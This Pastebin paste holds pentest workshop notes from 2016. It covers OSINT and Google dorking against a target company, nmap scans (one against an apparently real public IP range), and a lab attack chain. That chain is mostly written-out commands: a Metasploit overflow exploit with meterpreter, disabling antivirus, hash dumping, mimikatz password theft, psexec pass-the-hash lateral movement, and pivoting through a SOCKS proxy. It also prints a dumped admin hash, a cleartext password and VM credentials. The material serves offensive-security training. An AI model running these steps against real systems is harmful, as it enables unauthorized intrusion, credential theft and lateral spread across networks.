SHOW:
|
|
- or go back to the newest paste.
1 | ################################ | |
2 | # Pentester Night School 2016 # | |
3 | # By Joe McCray # | |
4 | ################################ | |
5 | ||
6 | ||
7 | ########## | |
8 | # VMWare # | |
9 | ########## | |
10 | - For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player. | |
11 | ||
12 | - Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class. | |
13 | ||
14 | ||
15 | ########################## | |
16 | # Download the attack VM # | |
17 | ########################## | |
18 | ||
19 | VM for these labs | |
20 | ----------------- | |
21 | https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip | |
22 | user: strategicsec | |
23 | pass: strategicsec | |
24 | ||
25 | --------------------------------------------------------------------------------------------------------------------------------- | |
26 | ||
27 | ||
28 | ||
29 | ||
30 | ||
31 | ################################ | |
32 | # Tactical Pentest Methodology # | |
33 | ################################ | |
34 | ||
35 | The purpose of this section of the Pastebin document is to provide you with a tactical pentest plan. | |
36 | ||
37 | ||
38 | ||
39 | -=-=-=-=-=- Phase 1 -=-=-=-=-=- | |
40 | ||
41 | ||
42 | ########################################## | |
43 | # Step 1: External Target Identification # | |
44 | ########################################## | |
45 | Find all of the IP ranges owned by your target company via the following websites: | |
46 | - https://www.robtex.com/ | |
47 | - http://toolbar.netcraft.com/site_report | |
48 | ||
49 | Look for weak SSL implementations | |
50 | - https://www.ssllabs.com/ssltest/ | |
51 | ||
52 | ||
53 | ||
54 | ||
55 | ############################# | |
56 | # Step 2: Google Quick Hits # | |
57 | ############################# | |
58 | ||
59 | Be thorough, and really look for vulnerabilities and data leakages that are relevant to what you learned while doing your OSINT work. | |
60 | https://www.exploit-db.com/google-hacking-database/ | |
61 | ||
62 | Really good google dorks to use: | |
63 | site:yourtarget.com filetype:pcf | |
64 | site:yourtarget.com filetype:ica | |
65 | ||
66 | 1. Footholds: | |
67 | ------------- | |
68 | https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=1&ghdb_search_text= | |
69 | ||
70 | Be sure to use 'site:yourtarget.com' [ google dork for the site above ] | |
71 | ||
72 | ||
73 | 2. Passwords: | |
74 | ------------- | |
75 | https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=9&ghdb_search_text= | |
76 | ||
77 | Be sure to use 'site:yourtarget.com' [ google dork for the site above ] | |
78 | ||
79 | ||
80 | 3. Sensitive Directories: | |
81 | ------------------------- | |
82 | https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=3&ghdb_search_text= | |
83 | ||
84 | Be sure to use 'site:yourtarget.com' [ google dork for the site above ] | |
85 | ||
86 | ||
87 | ||
88 | ||
89 | Make sure that you do at least 50-100 different Google dorks. Do no less than 10 dorks per category. | |
90 | ||
91 | ||
92 | ||
93 | ########################### | |
94 | # Step 3: Compromise Data # | |
95 | ########################### | |
96 | Look to see if they have already been breached | |
97 | ||
98 | Search for the target company (and their major competitors) in the Data Breach Database | |
99 | http://www.privacyrights.org/data-breach | |
100 | ||
101 | Place targetgcompany.com in the search box of the link below to look known breaches | |
102 | http://zone-h.com/search | |
103 | ||
104 | Replace targetgcompany.com with your target domain name to look for known XSS vulnerabilities in the site. | |
105 | http://xssed.com/search?key=targetcompany.com | |
106 | ||
107 | ||
108 | ||
109 | ############################## | |
110 | # Step 4: Build OSINT Report # | |
111 | ############################## | |
112 | ||
113 | Passive Recon | |
114 | ------------- | |
115 | Install this add-on and enumerate as much info as possible | |
116 | - https://addons.mozilla.org/en-US/firefox/addon/passiverecon/ | |
117 | ||
118 | ||
119 | Next we build at an OSINT report with the data gleaned from the previous steps: | |
120 | https://s3.amazonaws.com/StrategicSec-Files/OSINT_Innophos_11242010.doc | |
121 | ||
122 | We looked through this to get an idea of what is not only involved in doing passive recon, but what the actual output of the work should look like. | |
123 | ||
124 | --------------------------------------------------------------------------------------------------------------------------------- | |
125 | ||
126 | -=-=-=-=-=- Phase 2 -=-=-=-=-=- | |
127 | ########################## | |
128 | # Download the attack VM # | |
129 | ########################## | |
130 | ||
131 | VM for these labs | |
132 | ----------------- | |
133 | https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip | |
134 | user: strategicsec | |
135 | pass: strategicsec | |
136 | ||
137 | ||
138 | ############################################ | |
139 | # Identifying External Security Mechanisms # | |
140 | ############################################ | |
141 | ||
142 | sudo /sbin/iptables -F | |
143 | strategicsec | |
144 | ||
145 | cd /home/strategicsec/toolz | |
146 | ||
147 | ||
148 | ||
149 | ########################### | |
150 | # Target IP Determination # | |
151 | ########################### | |
152 | cd /home/strategicsec/toolz | |
153 | perl blindcrawl.pl -d targetgcompany.com | |
154 | ||
155 | -- Take each IP address and look ip up here: | |
156 | http://www.networksolutions.com/whois/index.jsp | |
157 | ||
158 | cd ~/toolz/fierce2 | |
159 | fierce -dns targetgcompany.com | |
160 | cd .. | |
161 | ||
162 | ||
163 | ||
164 | cd ~/toolz/ | |
165 | ./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range) | |
166 | ||
167 | ||
168 | sudo nmap -sL 148.87.1.0-255 | |
169 | strategicsec | |
170 | ||
171 | sudo nmap -sL 148.87.1.0-255 | grep oracle | |
172 | strategicsec | |
173 | ||
174 | ||
175 | sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255 | |
176 | strategicsec | |
177 | ||
178 | Reference: | |
179 | http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html | |
180 | ||
181 | ||
182 | ||
183 | ########################### | |
184 | # Load Balancer Detection # | |
185 | ########################### | |
186 | Here are some command-line options to use for identifying load balancers: | |
187 | ||
188 | dig google.com | |
189 | ||
190 | cd ~/toolz | |
191 | ./lbd-0.1.sh targetgcompany.com | |
192 | ||
193 | ||
194 | halberd targetgcompany.com | |
195 | ||
196 | ||
197 | ||
198 | ###################################### | |
199 | # Web Application Firewall Detection # | |
200 | ###################################### | |
201 | ||
202 | cd ~/toolz/wafw00f | |
203 | python wafw00f.py http://www.targetgcompany.com | |
204 | ||
205 | cd ~/toolz/ | |
206 | sudo nmap -p 80 --script http-waf-detect.nse targetgcompany.com | |
207 | strategicsec | |
208 | ||
209 | sudo nmap -p 80 --script http-waf-detect.nse targetgcompany.com | |
210 | strategicsec | |
211 | ||
212 | ||
213 | --------------------------------------------------------------------------------------------------------------------------------- | |
214 | ||
215 | -=-=-=-=-=- Phase 3 -=-=-=-=-=- | |
216 | Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover. | |
217 | ||
218 | So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN: | |
219 | https://s3.amazonaws.com/StrategicSec-Files/Strategic-Security-2016-VPN-Info.pdf | |
220 | ||
221 | sudo nmap -sP 10.0.0.0/24 | |
222 | ||
223 | sudo nmap -sL 10.0.0.0/24 | |
224 | ||
225 | cd ~/toolz | |
226 | ||
227 | wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c | |
228 | ||
229 | gcc ipcrawl.c -o ipcrawl | |
230 | ||
231 | chmod 777 ipcrawl | |
232 | ||
233 | ./ipcrawl 10.0.0.1 10.0.0.254 | |
234 | ||
235 | ||
236 | ||
237 | wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c | |
238 | ||
239 | gcc propecia.c propecia | |
240 | ||
241 | sudo cp propecia /bin | |
242 | ||
243 | propecia 10.0.0 22 | |
244 | ||
245 | propecia 10.0.0 3389 | |
246 | ||
247 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open | |
248 | ||
249 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}' | |
250 | ||
251 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l | |
252 | ||
253 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | |
254 | ||
255 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt | |
256 | ||
257 | cd ~/toolz | |
258 | wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2 | |
259 | tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2 | |
260 | sudo cp wkhtmltoimage-i386 /usr/local/bin/ | |
261 | ||
262 | git clone git://github.com/SpiderLabs/Nmap-Tools.git | |
263 | cd Nmap-Tools/NSE/ | |
264 | sudo cp http-screenshot.nse /usr/share/nmap/scripts/ | |
265 | sudo nmap --script-updatedb | |
266 | ||
267 | cd ~/toolz/ | |
268 | mkdir labscreenshots | |
269 | cd labscreenshots/ | |
270 | ||
271 | sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/strategicsec/labnet-ip-list.txt | |
272 | ||
273 | ||
274 | ||
275 | ||
276 | vi screenshots.sh | |
277 | ||
278 | #!/bin/bash | |
279 | printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html | |
280 | ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html | |
281 | printf "</BODY></HTML>" >> labnet-port-80-screenshots.html | |
282 | ||
283 | ||
284 | ||
285 | ||
286 | ||
287 | sh screenshots.sh | |
288 | ||
289 | ||
290 | ||
291 | ||
292 | ########################## | |
293 | # Nmap NSE tricks to try # | |
294 | ########################## | |
295 | sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24 | |
296 | ||
297 | sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24 | |
298 | ||
299 | sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24 | |
300 | ||
301 | sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24 | |
302 | ||
303 | sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24 | |
304 | ||
305 | sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24 | |
306 | ||
307 | sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24 | |
308 | ||
309 | sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24 | |
310 | ||
311 | sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24 | |
312 | ||
313 | sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24 | |
314 | ||
315 | sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24 | |
316 | ||
317 | sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24 | |
318 | ||
319 | ||
320 | ||
321 | ||
322 | #################################### | |
323 | # Finally, let's exploit something # | |
324 | #################################### | |
325 | ||
326 | nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}' | |
327 | ||
328 | nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15 | |
329 | ||
330 | https://www.exploit-db.com/search | |
331 | ||
332 | Search for: | |
333 | Savant httpd 3.1 | |
334 | Apache httpd 2.0.58 ((Win32)) | |
335 | ||
336 | ||
337 | Found one written in Python: | |
338 | https://www.exploit-db.com/exploits/18401/ | |
339 | ||
340 | Found one for Savant 3.1 from Metasploit: | |
341 | https://www.exploit-db.com/exploits/16770/ | |
342 | ||
343 | ||
344 | ||
345 | cd ~/toolz/metasploit | |
346 | ./msfconsole | |
347 | use exploit/windows/http/savant_31_overflow | |
348 | set RHOST 10.0.0.15 | |
349 | set PAYLOAD windows/meterpreter/bind_nonx_tcp | |
350 | set RPORT 80 | |
351 | set LPORT 7777 | |
352 | exploit | |
353 | ||
354 | ||
355 | ||
356 | ||
357 | ||
358 | ||
359 | ********************************** Figure out who and where you are ********************************** | |
360 | ||
361 | meterpreter> sysinfo | |
362 | ||
363 | ||
364 | meterpreter> getuid | |
365 | ||
366 | ||
367 | meterpreter> ipconfig | |
368 | ||
369 | ||
370 | meterpreter> run post/windows/gather/checkvm | |
371 | ||
372 | ||
373 | meterpreter> run get_local_subnets | |
374 | ||
375 | ||
376 | ||
377 | ********************************** Escalate privileges and get hashes ********************************** | |
378 | ||
379 | ||
380 | meterpreter> use priv | |
381 | ||
382 | ||
383 | ||
384 | meterpreter > getsystem | |
385 | ...got system (via technique 1). | |
386 | ||
387 | meterpreter > getuid | |
388 | Server username: NT AUTHORITY\SYSTEM | |
389 | ||
390 | -------------------------------------------------------- | |
391 | ||
392 | meterpreter> run killav | |
393 | ||
394 | meterpreter> run post/windows/gather/hashdump | |
395 | ||
396 | Got the following admin hash: | |
397 | Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363::: | |
398 | ||
399 | meterpreter> run post/windows/gather/credentials/credential_collector | |
400 | ||
401 | meterpreter > load mimikatz | |
402 | ||
403 | meterpreter > kerberos | |
404 | ||
405 | This should give me the administrative password: | |
406 | )K5?Jocb(Yx | |
407 | ||
408 | ||
409 | ********************************** Enumerate the host you are on ********************************** | |
410 | ||
411 | meterpreter> run winenum | |
412 | ||
413 | meterpreter > run post/windows/gather/enum_applications | |
414 | ||
415 | meterpreter > run post/windows/gather/enum_logged_on_users | |
416 | ||
417 | meterpreter > run post/windows/gather/usb_history | |
418 | ||
419 | meterpreter > run post/windows/gather/enum_shares | |
420 | ||
421 | meterpreter > run post/windows/gather/enum_snmp | |
422 | ||
423 | meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | |
424 | ||
425 | ||
426 | ********************************** Get out of Meterpreter ********************************** | |
427 | ||
428 | meterpreter> background | |
429 | ||
430 | msf exploit(savant_31_overflow) > back | |
431 | ||
432 | msf> | |
433 | ||
434 | ||
435 | ||
436 | ||
437 | ********************************** Lateral Movement ******************************* | |
438 | ||
439 | ||
440 | Now we can run the PSEXEC exploit. | |
441 | ||
442 | -- Option 1: | |
443 | use exploit/windows/smb/psexec | |
444 | ||
445 | set SMBUser Administrator | |
446 | ||
447 | set SMBPass )K5?Jocb(Yx | |
448 | ||
449 | set RHOST 10.0.0.15 | |
450 | ||
451 | set payload windows/meterpreter/bind_tcp | |
452 | ||
453 | set LPORT 2345 | |
454 | ||
455 | exploit | |
456 | ||
457 | ********************************** Get out of Meterpreter ********************************** | |
458 | ||
459 | meterpreter> background | |
460 | ||
461 | msf exploit(psexec) >back | |
462 | ||
463 | msf> | |
464 | ||
465 | ********************************** | |
466 | ||
467 | -- Option 2: | |
468 | use exploit/windows/smb/psexec | |
469 | ||
470 | set SMBUser Administrator | |
471 | ||
472 | set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363 | |
473 | ||
474 | set payload windows/meterpreter/bind_tcp | |
475 | ||
476 | set RHOST 10.0.0.15 | |
477 | ||
478 | set LPORT 5678 | |
479 | ||
480 | exploit | |
481 | ||
482 | ||
483 | ||
484 | ********************************** Set up your Pivot ********************************** | |
485 | ||
486 | meterpreter > background | |
487 | <-- background the session | |
488 | You want to get back to this prompt: | |
489 | msf exploit(handler) > back <--- you need to get to main msf> prompt | |
490 | ||
491 | ||
492 | ||
493 | sessions -l <--find a session you want to pivot through (note the IP and session number) | |
494 | ||
495 | Now set up Pivot with a route add | |
496 | --------------------------------- | |
497 | ||
498 | route print <--- should be blank | |
499 | ||
500 | route add 10.0.0.15 255.255.255.0 1 <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter) | |
501 | ||
502 | ||
503 | route print <----- verify new route | |
504 | ||
505 | ******************************Scan through your Pivot ****************************** | |
506 | ||
507 | use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot | |
508 | ||
509 | set THREADS 10 | |
510 | ||
511 | set RHOSTS 10.0.0.0/24 <-- Keep changing this IP and re-running the scan until you find something you want to attack | |
512 | ||
513 | set PORTS 445 | |
514 | ||
515 | run | |
516 | ||
517 | ||
518 | #################################### | |
519 | # Socks Tunneling with Proxychains # | |
520 | #################################### | |
521 | --- Open a duplicate putty session to your Ubuntu host | |
522 | ||
523 | sudo apt-get install -y proxychains | |
524 | strategicsec | |
525 | ||
526 | sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 1080 | |
527 | ||
528 | Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it. | |
529 | socks4 127.0.0.1 1080 | |
530 | ||
531 | ***************************Set up a Socks Proxy through your Pivot ************************* | |
532 | ||
533 | ||
534 | use auxiliary/server/socks4a | |
535 | ||
536 | set SRVHOST 127.0.0.1 | |
537 | ||
538 | set SRVPORT 1080 | |
539 | ||
540 | run | |
541 | ||
542 | --- Go back to your other putty session with the meterpreter shell | |
543 | cd ~ | |
544 | ||
545 | proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24 <--- This is going to be really slow | |
546 | ||
547 | proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24 <--- This is going to be really slow | |
548 | ||
549 | ||
550 | ---close the duplicate putty session to your Ubuntu host |